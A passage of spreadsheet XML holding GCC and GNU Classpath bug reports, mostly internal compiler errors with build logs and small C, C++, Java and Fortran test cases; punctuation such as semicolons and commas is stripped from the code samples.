Using gcc-3.4.0 bootstapped on Linux for i386
cd /home/duz/cc/
gcc-3.4 -v -O -S tst.cc
Reading specs from /opt/gnu/gcc-3.4.0/lib/gcc/i686-pc-linux-gnu/3.4.0/specs
Configured with: /pub/unpacked/gcc-3.4.0/configure --prefix=/opt/gnu/gcc-3.4.0
--enable-languages=cc++ --disable-shared --disable-nls --disable-multilib
--program-suffix=-3.4
Thread model: posix
gcc version 3.4.0
 /opt/gnu/gcc-3.4.0/libexec/gcc/i686-pc-linux-gnu/3.4.0/cc1plus -quiet -v
-D_GNU_SOURCE tst.cc -quiet -dumpbase tst.cc -mtune=pentiumpro -auxbase tst -O
-version -o tst.s
ignoring nonexistent directory
/opt/gnu/gcc-3.4.0/lib/gcc/i686-pc-linux-gnu/3.4.0/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /opt/gnu/gcc-3.4.0/lib/gcc/i686-pc-linux-gnu/3.4.0/../../../../include/c++/3.4.0
 /opt/gnu/gcc-3.4.0/lib/gcc/i686-pc-linux-gnu/3.4.0/../../../../include/c++/3.4.0/i686-pc-linux-gnu
 /opt/gnu/gcc-3.4.0/lib/gcc/i686-pc-linux-gnu/3.4.0/../../../../include/c++/3.4.0/backward
 /usr/local/include
 /opt/gnu/gcc-3.4.0/include
 /opt/gnu/gcc-3.4.0/lib/gcc/i686-pc-linux-gnu/3.4.0/include
 /usr/include
End of search list.
GNU C++ version 3.4.0 (i686-pc-linux-gnu)
	compiled by GNU C version 3.4.0.
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64471
tst.cc:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Compilation exited abnormally with code 1 at Wed Apr 21 15:54:06</t>
  </si>
  <si>
    <t>GCC-7268</t>
  </si>
  <si>
    <t>gcc 3.1 crashes</t>
  </si>
  <si>
    <t>Compiling kdelibs version 3.0.2 results in the following:
/bin/sh ../libtool --mode=compile --tag=CXX g++ -DHAVE_CONFIG_H -I. -I. -I.. -I./.. -I.. -I../dcop -I../libltdl -I../kdecore -I../kdeui -I../kio -I../kio/kio -I../kio/kfile -I/usr/src/kde-3.0.2/qt-x11-free-3.0.4/include -I/usr/X11R6/include -I/opt/kde-3.0.2//include   -DQT_THREAD_SUPPORT  -D_REENTRANT -I/usr/local/include  -Wnon-virtual-dtor -Wno-long-long -Wbad-function-cast -Wundef -Wall -pedantic -W -Wpointer-arith -Wmissing-prototypes -Wwrite-strings -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -Wcast-align -Wconversion -fno-builtin -g3 -fno-exceptions -fno-check-new  -DQT_NO_TRANSLATION -DQT_CLEAN_NAMESPACE -DQT_NO_ASCII_CAST -DQT_NO_COMPAT  -c -o kbuildservicegroupfactory.lo `test -f kbuildservicegroupfactory.cpp || echo './'`kbuildservicegroupfactory.cpp
g++ -DHAVE_CONFIG_H -I. -I. -I.. -I./.. -I.. -I../dcop -I../libltdl -I../kdecore -I../kdeui -I../kio -I../kio/kio -I../kio/kfile -I/usr/src/kde-3.0.2/qt-x11-free-3.0.4/include -I/usr/X11R6/include -I/opt/kde-3.0.2//include -DQT_THREAD_SUPPORT -D_REENTRANT -I/usr/local/include -Wnon-virtual-dtor -Wno-long-long -Wbad-function-cast -Wundef -Wall -pedantic -W -Wpointer-arith -Wmissing-prototypes -Wwrite-strings -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -Wcast-align -Wconversion -fno-builtin -g3 -fno-exceptions -fno-check-new -DQT_NO_TRANSLATION -DQT_CLEAN_NAMESPACE -DQT_NO_ASCII_CAST -DQT_NO_COMPAT -c kbuildservicegroupfactory.cpp -MT kbuildservicegroupfactory.lo -MD -MP -MF .deps/kbuildservicegroupfactory.TPlo  -fPIC -DPIC -o .libs/kbuildservicegroupfactory.o
cc1plus: warning: changing search order for system directory .
cc1plus: warning:   as it has already been specified as a non-system directory
cc1plus: warning: changing search order for system directory /usr/local/include
cc1plus: warning:   as it has already been specified as a non-system directory
In file included from /usr/src/kde-3.0.2/qt-x11-free-3.0.4/include/qiodevice.h:49
                 from /usr/src/kde-3.0.2/qt-x11-free-3.0.4/include/qtextstream.h:42
                 from /usr/src/kde-3.0.2/qt-x11-free-3.0.4/include/qtl.h:42
                 from /usr/src/kde-3.0.2/qt-x11-free-3.0.4/include/qvaluelist.h:42
                 from /usr/src/kde-3.0.2/qt-x11-free-3.0.4/include/qstringlist.h:42
                 from ../kio/kio/kservicegroupfactory.h:22
                 from kbuildservicegroupfactory.h:22
                 from kbuildservicegroupfactory.cpp:19:
/usr/src/kde-3.0.2/qt-x11-free-3.0.4/include/qglobal.h:464: internal error:
   Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [kbuildservicegroupfactory.lo] Error 1
make[2]: Leaving directory `/usr/src/kde-3.0.2/kdelibs-3.0.2/kded'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/usr/src/kde-3.0.2/kdelibs-3.0.2'
make: *** [all] Error 2
Release:
gcc 3.1
Environment:
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ./configure --enable-shared --with-stabs --enable-threads=pthreads --with-cpu=i686 --enable-checking --enable-nls : (reconfigured) ./configure --enable-shared --with-stabs --enable-threads --with-cpu=i686 --enable-checking --enable-nls
Thread model: posix
gcc version 3.1
How-To-Repeat:
Configure kdelibs as follows: ./configure --prefix=/opt/kde-3.0.2/ --enable-debug=full --enable-dnotify
Note: gcc was compiled from source and compiled with gcc 3.1 on the same machine where the crash occured</t>
  </si>
  <si>
    <t>jgluckca</t>
  </si>
  <si>
    <t>GCC-36800</t>
  </si>
  <si>
    <t>va_arg for _Decimal128 on 32-bit Power mishandled in certain cases</t>
  </si>
  <si>
    <t>The following fails on 32-bit hard-float powerpc*-*-linux* (tested for trunk
code inspection indicates present for 4.3 as well).
#include 
extern void abort (void)
void
f (int a ...)
{
  va_list ap
  if (a != 0)
    abort ()
  va_start (ap a)
  if (va_arg (ap _Decimal128) != 1.2DL)
    abort ()
  if (va_arg (ap _Decimal128) != 2.34DL)
    abort ()
  if (va_arg (ap _Decimal128) != 3.456DL)
    abort ()
  if (va_arg (ap _Decimal128) != 4.567DL)
    abort ()
  if (va_arg (ap double) != 5.125)
    abort ()
  va_end (ap)
}
int
main (void)
{
  f (0 1.2DL 2.34DL 3.456DL 4.567DL 5.125)
  return 0
}
Suppose some arguments are passed in floating-point registers using all but
f8 and maybe f7 of the registers available for floating-point arguments.
Suppose the next argument is _Decimal128 so is passed on the stack because
an aligned pair of registers is not available and that this _Decimal128
argument is one of the variable arguments in a call to a variadic function
and that a following argument is one that would fit in a single floating-point
register if the _Decimal128 argument hadn't forced all subsequent
floating-point arguments to go on the stack.
Then the code to ensure that subsequent va_arg calls after the one getting
that _Decimal128 argument do not look in the saved floating-point
registers
      if ((n_reg == 2 &amp;&amp; !regalign) || n_reg &gt; 2)
        {
          /* Ensure that we don't find any more args in regs.
             Alignment has taken care of for special cases.  */
          t = build_gimple_modify_stmt (reg
                                        build_int_cst (TREE_TYPE (reg) 8))
          gimplify_and_add (t pre_p)
        }
does not trigger because regalign is set.  But unlike the alignment for
pairs of GPRs the alignment here sets fpr to 7 leaving a subsequent va_arg
call thinking it can take a value from f8.
I think the fix is simply not to set regalign in this case but I haven't
tested this.</t>
  </si>
  <si>
    <t>GCC-9191</t>
  </si>
  <si>
    <t>A compile error generated an internal error rather than an error message.</t>
  </si>
  <si>
    <t>A mangled function declairation produced an internal error. Declaration was part of a template class. Here is the version of the declairation that caused the error (and relibly does cause said error:
DataClass *DataSet::Data(int i)
Here is the correct version:
template 
DataClass *DataSet::Data(int i)
Release:
unknown</t>
  </si>
  <si>
    <t>CLASSPATH-22964</t>
  </si>
  <si>
    <t>swing: keyTyped sent before newline has been added to JTextArea</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Compile and run the attached testcase.
2. Hit enter over the textarea.
Expected results:
1. Programs prints the following to stdout
keyPressed length now 0
keyTyped length now 1
keyReleased length now 1
Actual results:
1. Program prints the following to stdout
keyPressed length now 0
keyTyped length now 0
keyReleased length now 1
Testcase:
import java.awt.*
import java.awt.event.*
import javax.swing.*
public class keyhandler extends JFrame {
        private JTextArea a
        public static void main(String[] args) {
                (new keyhandler()).show()
        }
        public keyhandler() {
                this.a = new JTextArea(80 25)
                this.a.addKeyListener(new KeyHandler())
                this.setContentPane(a)
                this.setSize(new Dimension(400 400))
        }
        private class KeyHandler implements KeyListener {
                public void keyTyped(KeyEvent e) {
                        System.out.println(keyTyped length now  + keyhandler.this.a.getText().length())
                }
                public void keyPressed(KeyEvent e) {
                        System.out.println(keyPressed length now  + keyhandler.this.a.getText().length())
                }
                public void keyReleased(KeyEvent e) {
                        System.out.println(keyReleased length now  + keyhandler.this.a.getText().length())
                }
        }
}
Note that this bug seems to happen only with newline characters typing anything else won't trigger the bug.</t>
  </si>
  <si>
    <t>GCC-37920</t>
  </si>
  <si>
    <t>ICE (segv) with typename typeof in local struct</t>
  </si>
  <si>
    <t>When compiling the attached code I get an ICE:
$ /usr/lib/gcc-snapshot/bin/g++ -v -Q -save-temps -c ice.cpp
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 20080404-0ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-snapshot/README.Bugs --enable-languages=cc++javafortranobjcobj-c++ada --prefix=/usr/lib/gcc-snapshot --enable-shared --with-system-zlib --disable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-java-awt=gtk --enable-gtk-cairo --disable-plugin --with-java-home=/usr/lib/gcc-snapshot/jre --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-mpfr --enable-targets=all --disable-werror --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.3.1 20080404 (prerelease) [gcc-4_3-branch revision 133917] (Ubuntu 20080404-0ubuntu1)
COLLECT_GCC_OPTIONS='-v' '-Q' '-save-temps' '-c' '-shared-libgcc' '-mtune=generic'
 /usr/lib/gcc-snapshot/libexec/gcc/i486-linux-gnu/4.3.1/cc1plus -E -v -D_GNU_SOURCE ice.cpp -mtune=generic -fpch-preprocess -o ice.ii
ignoring nonexistent directory /usr/local/include/i486-linux-gnu
ignoring nonexistent directory /usr/lib/gcc-snapshot/lib/gcc/i486-linux-gnu/4.3.1/../../../../i486-linux-gnu/include
ignoring nonexistent directory /usr/include/i486-linux-gnu
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc-snapshot/lib/gcc/i486-linux-gnu/4.3.1/../../../../include/c++/4.3.1
 /usr/lib/gcc-snapshot/lib/gcc/i486-linux-gnu/4.3.1/../../../../include/c++/4.3.1/i486-linux-gnu
 /usr/lib/gcc-snapshot/lib/gcc/i486-linux-gnu/4.3.1/../../../../include/c++/4.3.1/backward
 /usr/local/include
 /usr/lib/gcc-snapshot/include
 /usr/lib/gcc-snapshot/lib/gcc/i486-linux-gnu/4.3.1/include
 /usr/lib/gcc-snapshot/lib/gcc/i486-linux-gnu/4.3.1/include-fixed
 /usr/include
End of search list.
Execution times (seconds)
 TOTAL                 :   0.17             0.02             0.20               3835 kB
COLLECT_GCC_OPTIONS='-v' '-Q' '-save-temps' '-c' '-shared-libgcc' '-mtune=generic'
 /usr/lib/gcc-snapshot/libexec/gcc/i486-linux-gnu/4.3.1/cc1plus -fpreprocessed ice.ii -dumpbase ice.cpp -mtune=generic -auxbase ice -version -o ice.s
GNU C++ (Ubuntu 20080404-0ubuntu1) version 4.3.1 20080404 (prerelease) [gcc-4_3-branch revision 133917] (i486-linux-gnu)
        compiled by GNU C version 4.3.1 20080404 (prerelease) [gcc-4_3-branch revision 133917] GMP version 4.2.2 MPFR version 2.3.1.
GGC heuristics: --param ggc-min-expand=98 --param ggc-min-heapsize=128223
options passed:  -fpreprocessed ice.ii -mtune=generic
options enabled:  -falign-loops -fargument-alias -fauto-inc-dec
 -fbranch-count-reg -fcommon -fearly-inlining
 -feliminate-unused-debug-types -fexceptions -ffunction-cse -fgcse-lm
 -fident -fivopts -fkeep-static-consts -fleading-underscore -fmath-errno
 -fmerge-debug-strings -fmove-loop-invariants -fpcc-struct-return
 -fpeephole -fsched-interblock -fsched-spec -fsched-stalled-insns-dep
 -fsigned-zeros -fsplit-ivs-in-unroller -ftoplevel-reorder -ftrapping-math
 -ftree-cselim -ftree-loop-im -ftree-loop-ivcanon -ftree-loop-optimize
 -ftree-parallelize-loops= -ftree-reassoc -ftree-scev-cprop
 -ftree-vect-loop-version -fvar-tracking -fvect-cost-model
 -fzero-initialized-in-bss -m32 -m80387 -m96bit-long-double
 -maccumulate-outgoing-args -malign-stringops -mfancy-math-387
 -mfp-ret-in-387 -mfused-madd -mglibc -mieee-fp -mno-red-zone -mno-sse4
 -mpush-args -msahf -mtls-direct-seg-refs
Compiler executable checksum: dd9fb97039947d8c4927d069b05a68b5
 bool std::rel_ops::operator!=(const _Tp&amp; const _Tp&amp;) bool std::rel_ops::operator&gt;(const _Tp&amp; const _Tp&amp;) bool std::rel_ops::operator=(const _Tp&amp; const _Tp&amp;) void std::swap(_Tp&amp; _Tp&amp;) std::pair::pair() std::pair::pair(const _T1&amp; const _T2&amp;) std::pair::pair(const std::pair&amp;) bool std::operator==(const std::pair&amp; const std::pair&amp;) bool std::operator&amp; const std::pair&amp;) bool std::operator!=(const std::pair&amp; const std::pair&amp;) bool std::operator&gt;(const std::pair&amp; const std::pair&amp;) bool std::operator&amp; const std::pair&amp;) bool std::operator&gt;=(const std::pair&amp; const std::pair&amp;) std::pair std::make_pair(_T1 _T2) long int std::abs(long int) ldiv_t std::div(long int long int) long long int __gnu_cxx::abs(long long int) lldiv_t __gnu_cxx::div(long long int long long int) mpl_::int_::operator int() const mpl_::bool_::operator bool() const mpl_::integral_c::operator T() const mpl_::integral_c::operator bool() const mpl_::size_t::operator size_t() const boost::aligned_storage::aligned_storage() boost::aligned_storage::~aligned_storage() void* boost::aligned_storage::address() const void* boost::aligned_storage::address() const void func1(int&amp;) func1(int&amp;)::_scope_exit_9::_scope_exit_9(int&amp;) func1(int&amp;)::_scope_exit_9::_scope_exit_9(int&amp;) func1(int&amp;)::_scope_exit_9::_scope_exit_9(int&amp;) func1(int&amp;)::_scope_exit_9::~_scope_exit_9() func1(int&amp;)::_scope_exit_9::~_scope_exit_9() func1(int&amp;)::_scope_exit_9::~_scope_exit_9() void func2(T&amp;) func2(T&amp;)::_scope_exit_17::_scope_exit_17(typename __typeof__ (boost::type_of::ensure_obj(scope_exit::wrap_type(t)))::type&amp;) func2(T&amp;)::_scope_exit_17::~_scope_exit_17() int main() void func2(T&amp;) [with T = double]
ice.cpp: In constructor 'func2(T&amp;)::_scope_exit_17::_scope_exit_17(typename __typeof__ (boost::type_of::ensure_obj(scope_exit::wrap_type(t)))::type&amp;) [with T = double]':
ice.cpp:15:   instantiated from 'void func2(T&amp;) [with T = double]'
ice.cpp:29:   instantiated from here
ice.cpp:15: internal compiler error: in tsubst_copy at cp/pt.c:9723
The same code but used within a non-template function (func1 in the attached file) and therefore without the typename keyword does not cause an ICE.
This also happens with the other versions of gcc on my machine:
$ gcc -v
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.2 --program-suffix=-4.2 --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --enable-mpfr --enable-targets=all --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu3)
$ gcc-4.1 -v
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.1.3 --program-suffix=-4.1 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --enable-checking=release i486-linux-gnu
Thread model: posix
gcc version 4.1.3 20080308 (prerelease) (Ubuntu 4.1.2-21ubuntu1)</t>
  </si>
  <si>
    <t>GCC-69066</t>
  </si>
  <si>
    <t>SFINAE compilation error on lambda with trailing return type</t>
  </si>
  <si>
    <t>auto bound_f = [=](auto... xs) -&gt; decltype(f(x xs...))
{
    return f(x xs...)
}
return curry_impl&lt;decltype(bound_f)
    is_zero_callable{}&gt;::exec(bound_f)
---
`is_zero_callable` is a type-trait like struct making use of `void_t` detection techniques.
clang++ compiles the code correctly and triggers SFINAE thanks to `bound_f`'s explicit trailing return type.
g++ fails to compile the code (see godbolt example).
---
Example on gcc.godbolt.org: https://goo.gl/2hWTTN
Additional information: http://stackoverflow.com/a/34484150/598696</t>
  </si>
  <si>
    <t>GCC-12115</t>
  </si>
  <si>
    <t>arena new does not accept struct or class keywords.</t>
  </si>
  <si>
    <t>g++ does not accept code that allocates an object with an explicit struct/class
keyword thru area new. To reproduce this bug enter the following program:
/* snip */
#include 
class PrecinctKeeper {   
public:
  void *operator new(size_t sizeint)
  {
    return malloc(size)
  }
  void operator delete(void *arg)
  {
    free(arg)
  }
  PrecinctKeeper(void)
  {
  }
}
class Band {
  struct PrecinctKeeper *blocks
  //
public:
  void Alloc()
  {
    blocks = new(5) class PrecinctKeeper
  }
}
int main(int argcchar **argv)
{
  return 0
}
/* snip */ 
and compile with g++-3.3 foo.cpp. The resulting error is:
band.cpp: In member function `void Band::Alloc()':
band.cpp:24: error: invalid use of undefined type `struct 
   Band::Alloc()::PrecinctKeeper'
band.cpp:24: error: forward declaration of `struct 
   Band::Alloc()::PrecinctKeeper'
band.cpp:24: error: ISO C++ forbids defining types within new
Workaround:
Replace
    blocks = new(5) class PrecinctKeeper
by
    blocks = new(5) PrecinctKeeper
i.e. drop the explicit class keyword.
This bug also appears in g++-2.95 and g++-3.2 maybe other releases are
affected as well.</t>
  </si>
  <si>
    <t>GCC-26969</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE with -O1 -funswitch-loops -ftree-vectorize</t>
  </si>
  <si>
    <t>With the following code gcc-4.1 and 4.2 ICE when using -O3 -ftree-vectorize.  The latest checkout I have of 4.0 worked just fine.
struct re_pattern_buffer
{
  char *buffer
  char *fastmap
  long options
}
void
ruby_re_compile_fastmap (struct re_pattern_buffer *bufp)
{
  unsigned char *pattern = (unsigned char *) bufp-&gt;buffer
  register char *fastmap = bufp-&gt;fastmap
  register unsigned char *p = pattern
  register int j
  int options = bufp-&gt;options
  while (p)
    {
      switch (*p++)
    {
    case 0:
      for (j = 0 j &lt; (1 &lt;&lt; 8) j++)
        {
          if (j != '\n' || (options &amp; (((1L) &lt;&lt; 1) &lt;&lt; 1)))
        fastmap[j] = 1
        }
    }
    }
}
gcc version 4.2.0 20060331 (experimental)
gcc -O3 -ftree-vectorize ruby.c -c
ruby.x.i: In function â€˜ruby_re_compile_fastmapâ€™:
ruby.x.i:9: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions</t>
  </si>
  <si>
    <t>GCC-25407</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE when assigning value of variable passed to template as reference</t>
  </si>
  <si>
    <t>The following code produces an ICE in both gcc-3.4.4 and gcc-3.4.5 I've been told it compiles fine in a 4.x version of the compiler.
int var1 = 0
template &lt;int  var2 = v }
int main() {
	get_data()
	return 0
}
preprocessed source is as followes:
// /usr/libexec/gcc/i686-pc-linux-gnu/3.4.5/cc1plus -quiet -D_GNU_SOURCE test.cc -quiet -dumpbase test.cc -mtune=pentiumpro -auxbase test -Wall -W -o - -frandom-seed=0
# 1 test.cc
# 1 
# 1 
# 1 test.cc
int var1 = 0
template &lt;int  var2 = v }
int main() {
 get_data()
 return 0
}
it produces the following output when compiled with g++ -Wall -W test.cc -c:
test.cc: In function `void get_data() [with int&amp;v = ((int&amp;)(&amp;var1))]':
test.cc:6:   instantiated from here
test.cc:4: internal compiler error: in build_modify_expr at cp/typeck.c:5190
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccNxQKpG.out file please attach this to your bugreport.
I am not sure if it matters but I am running a gentoo installation gcc was compiled with the following CFLAGS/CXXFLAGS:
-march=pentium-m -pipe -O2
My system is running on the following kernel:
System uname: 2.6.14-gentoo-r4 i686 Intel(R) Pentium(R) M processor 2.00GHz
If there is anything else you need I'll be more than happy to provide it.
Evan Teran</t>
  </si>
  <si>
    <t>eteran</t>
  </si>
  <si>
    <t>GCC-56270</t>
  </si>
  <si>
    <t>[4.6 Regression] loop over array of struct float causes compiler error: segmentation fault</t>
  </si>
  <si>
    <t>Created attachment 29408
Preprocessed file comment compiler call compiler configuration
Compiling a loop over an array of struct with members of type float leads to:
internal compiler error: Segmentation Fault
Occurs optimizing with -O3
Affected gcc versions: 4.7.2 4.6.3 4.6.1 4.5.2 (at least)
NOT affected versions: 3.4.3 (at least)
Platforms: Solaris 11.1 Ubuntu 12.04.2 LTS (precise) Linux Mint 12 (Lisa)
(Ubuntu and LinuxMint in Virtual Box)
Solaris uname -a: SunOS xxx 5.11 11.1 i86pc i386 i86pc
Ubuntu uname -a Linux xxx 3.2.0-37-generic #58-Ubuntu SMP Thu Jan 24 15:28:10 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
LinuxMint uname -a: Linux xxx 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:56:25 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
Attachment contains preprocessed file and further information</t>
  </si>
  <si>
    <t>4303843KIWEMNPULN</t>
  </si>
  <si>
    <t>GCC-50902</t>
  </si>
  <si>
    <t>[4.7 Regression] intVar/dinternal.cc ICEs at -O2 -ftree-vectorize</t>
  </si>
  <si>
    <t>Created attachment 25644
preprocessed source file for intVar/dinternal.cc
The g++ compiler in current gcc trunk ICEs when compiling intVar/dinternal.cc from xplor-nih 2.27 with -O2 -ftree-vectorize or -O3.
g++-fsf-4.7 -c dinternal.cc -O2 -ftree-vectorize -fpermissive -DX_MMAP_FLAGS=0 -DFORTRAN_INIT -fno-common -DDARWIN -D_REENTRANT -DNDEBUG -I/Users/howarth/xplor-nih-2.27/intVar/ -I/Users/howarth/xplor-nih-2.27/arch/Darwin_11_x86_64/include -DCPLUSPLUS -DUSE_CDS_NAMESPACE -I/Users/howarth/xplor-nih-2.27/intVar/ -I/Users/howarth/xplor-nih-2.27/arch/Darwin_11_x86_64/include -I/Users/howarth/xplor-nih-2.27/CDSlib -I/Users/howarth/xplor-nih-2.27/common
In file included from dinternal.cc:1251:0:
/Users/howarth/xplor-nih-2.27/CDSlib/matrixTools.cc: In instantiation of 'MATRIX MatrixTools::callInverse(const MATRIX typename MATRIX::ElementType = double]':
/Users/howarth/xplor-nih-2.27/CDSlib/matrixTools.cc:237:35:   required from 'MATRIX MatrixTools::inverse(const MATRIX typename MATRIX::MatrixType = FullMatrix]'
dinternal.cc:945:29:   required from here
/Users/howarth/xplor-nih-2.27/CDSlib/matrixTools.cc:170:2: warning: 'callTRF' was not declared in this scope and no declarations were found by argument-dependent lookup at the point of instantiation [-fpermissive]
/Users/howarth/xplor-nih-2.27/CDSlib/matrixTools.cc:293:1: note: 'template void callTRF(const int&amp; const int&amp; Number* const int&amp; int* int&amp;)' declared here later in the translation unit
/Users/howarth/xplor-nih-2.27/CDSlib/matrixTools.cc:180:2: warning: 'callTRI' was not declared in this scope and no declarations were found by argument-dependent lookup at the point of instantiation [-fpermissive]
/Users/howarth/xplor-nih-2.27/CDSlib/matrixTools.cc:274:1: note: 'template void callTRI(const int&amp; Number* const int&amp; const int* Number* const int&amp; int&amp;)' declared here later in the translation unit
In file included from dinternal.cc:1238:0:
/Users/howarth/xplor-nih-2.27/CDSlib/cdsVector.cc: In constructor 'CDSVectorBase::CDSVectorBase(int const T ALLOC = CDS::DefaultAlloc]':
/Users/howarth/xplor-nih-2.27/CDSlib/cdsVector.cc:25:1: internal compiler error: in build_vector_from_val at tree.c:1382</t>
  </si>
  <si>
    <t>GCC-48155</t>
  </si>
  <si>
    <t>Reload doesn't handle subreg properly</t>
  </si>
  <si>
    <t>Given input:
(plus:SI (subreg:SI (plus:DI (reg/f:DI 7 sp)
            (const_int 16 [0x10])) 0)
    (const_int -1 [0xffffffffffffffff]))
reloads tries to add
(subreg:SI (plus:DI (reg/f:DI 7 sp)
        (const_int 16 [0x10])) 0)
to
(reg:SI 1 dx)
This code:
 /* How to do this reload can get quite tricky.  Normally we are being
     asked to reload a simple operand such as a MEM a constant or a pseudo
     register that didn't get a hard register.  In that case we can just
     call emit_move_insn.
     We can also be asked to reload a PLUS that adds a register or a MEM to
     another register constant or MEM.  This can occur during frame pointer
     elimination and while reloading addresses.  This case is handled by
     trying to emit a single insn to perform the add.  If it is not valid
     we use a two insn sequence.
     Or we can be asked to reload an unary operand that was a fragment of
     an addressing mode into a register.  If it isn't recognized as-is
     we try making the unop operand and the reload-register the same:
     (set reg:X (unop:X expr:Y))
     -&gt; (set reg:Y expr:Y) (set reg:X (unop:X reg:Y)).
     Finally we could be called to handle an 'o' constraint by putting
     an address into a register.  In that case we first try to do this
     with a named pattern of reload_load_address.  If no such pattern
     exists we just emit a SET insn and hope for the best (it will normally
     be valid on machines that use 'o').
     This entire process is made complex because reload will never
     process the insns we generate here and so we must ensure that
     they will fit their constraints and also by the fact that parts of
     IN might be being reloaded separately and replaced with spill registers.
     Because of this we are in some sense just guessing the right approach
     here.  The one listed above seems to work.
     ??? At some point this whole thing needs to be rethought.  */
  if (GET_CODE (in) == PLUS
      &amp;&amp; (REG_P (XEXP (in 0))
          || GET_CODE (XEXP (in 0)) == SUBREG
          || MEM_P (XEXP (in 0)))
      &amp;&amp; (REG_P (XEXP (in 1))
          || GET_CODE (XEXP (in 1)) == SUBREG
          || CONSTANT_P (XEXP (in 1))
          || MEM_P (XEXP (in 1))))
doesn't check if XEXP (in 0/1) is a SUBREG of REG.</t>
  </si>
  <si>
    <t>GCC-61429</t>
  </si>
  <si>
    <t>SYSTEM_CLOCK used with non-default integer kind does not produce warning</t>
  </si>
  <si>
    <t>Compiling:
program main
implicit none
integer(kind=8) :: i
call system_clock(i)
end program main
with gfortran -std=f95 -pedantic -Wall -Wextra produces no warning. According to the F95 standard (13.14.106) COUNT (optional) shall be scalar and of type default integer (it's the same for COUNT_RATE and COUNT_MAX). It's not until F2003 (13.7.117) that the wording is changed to COUNT (optional) shall be scalar and of type integer.
Summary: using any other kind but default integer with system_clock should not be allowed or give a warning under -std=f95 but should be allowed for -std=f2003 and later.</t>
  </si>
  <si>
    <t>thatcadguy</t>
  </si>
  <si>
    <t>GCC-21383</t>
  </si>
  <si>
    <t>[3.4 Regression] Crash when finding &amp;a_templated_func</t>
  </si>
  <si>
    <t>Crash when finding &amp;a_templated_func. I realize that that's not valid
code so I expected I diagnostic but I got an ICE instead.
Here's the command line:
panacea&gt; g++ -v -save-temps /tmp/gccbug.cc 
Reading specs from /usr/local/gcc-3.4.3/lib/gcc/i686-pc-linux-gnu/3.4.3/specs
Configured with: ../gcc-3.4.3/configure --prefix=/usr/local/gcc-3.4.3 --enable-l
anguages=cc++f77
Thread model: posix
gcc version 3.4.3
 /usr/local/gcc-3.4.3/libexec/gcc/i686-pc-linux-gnu/3.4.3/cc1plus -E -quiet -v -
D_GNU_SOURCE /tmp/gccbug.cc -mtune=pentiumpro -o gccbug.ii
ignoring nonexistent directory /usr/local/gcc-3.4.3/lib/gcc/i686-pc-linux-gnu/3
.4.3/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/gcc-3.4.3/lib/gcc/i686-pc-linux-gnu/3.4.3/../../../../include/c++/3.
4.3
 /usr/local/gcc-3.4.3/lib/gcc/i686-pc-linux-gnu/3.4.3/../../../../include/c++/3.
4.3/i686-pc-linux-gnu
 /usr/local/gcc-3.4.3/lib/gcc/i686-pc-linux-gnu/3.4.3/../../../../include/c++/3.
4.3/backward
 /usr/local/include
 /usr/local/gcc-3.4.3/include
 /usr/local/gcc-3.4.3/lib/gcc/i686-pc-linux-gnu/3.4.3/include
 /usr/include
End of search list.
 /usr/local/gcc-3.4.3/libexec/gcc/i686-pc-linux-gnu/3.4.3/cc1plus -fpreprocessed
 gccbug.ii -quiet -dumpbase gccbug.cc -mtune=pentiumpro -auxbase gccbug -version
 -o gccbug.s
GNU C++ version 3.4.3 (i686-pc-linux-gnu)
        compiled by GNU C version 3.2.3.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
/tmp/gccbug.cc: In function `int main()':
/tmp/gccbug.cc:13: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
And here is the preprocessed source code:
# 1 /tmp/gccbug.cc
# 1 
# 1 
# 1 /tmp/gccbug.cc
template 
void dummy(T&amp; t)
{}
void anyfunc(int x)
{}
int main()
{
   anyfunc(
}</t>
  </si>
  <si>
    <t>mahall</t>
  </si>
  <si>
    <t>GCC-56923</t>
  </si>
  <si>
    <t>Internal compiler error: Error reporting routines re-entered if -Weffc++ specified</t>
  </si>
  <si>
    <t>Created attachment 29860
preprocessed file and console output from gcc
works fine without -Weffc++ 
Version info:
Using built-in specs.
COLLECT_GCC=/opt/gcc-4.7.3/bin/g++
